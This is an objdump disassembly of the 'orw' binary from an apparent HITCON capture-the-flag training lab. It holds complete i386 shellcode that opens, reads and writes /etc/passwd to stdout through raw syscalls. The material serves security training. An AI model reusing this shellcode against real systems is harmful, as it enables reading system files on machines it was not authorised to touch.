
../../HITCON-Training/LAB/lab2/orw:     file format elf32-i386


Disassembly of section .text:

08048060 <.text>:
 8048060:	eb 20                	jmp    0x8048082
 8048062:	5b                   	pop    %ebx
 8048063:	31 c0                	xor    %eax,%eax
 8048065:	b0 05                	mov    $0x5,%al
 8048067:	31 c9                	xor    %ecx,%ecx
 8048069:	cd 80                	int    $0x80
 804806b:	89 c3                	mov    %eax,%ebx
 804806d:	b0 03                	mov    $0x3,%al
 804806f:	89 e1                	mov    %esp,%ecx
 8048071:	b2 30                	mov    $0x30,%dl
 8048073:	cd 80                	int    $0x80
 8048075:	b0 04                	mov    $0x4,%al
 8048077:	b3 01                	mov    $0x1,%bl
 8048079:	b2 30                	mov    $0x30,%dl
 804807b:	cd 80                	int    $0x80
 804807d:	31 c0                	xor    %eax,%eax
 804807f:	40                   	inc    %eax
 8048080:	cd 80                	int    $0x80
 8048082:	e8 db ff ff ff       	call   0x8048062
 8048087:	2f                   	das    
 8048088:	65                   	gs
 8048089:	74 63                	je     0x80480ee
 804808b:	2f                   	das    
 804808c:	70 61                	jo     0x80480ef
 804808e:	73 73                	jae    0x8048103
 8048090:	77 64                	ja     0x80480f6
	...
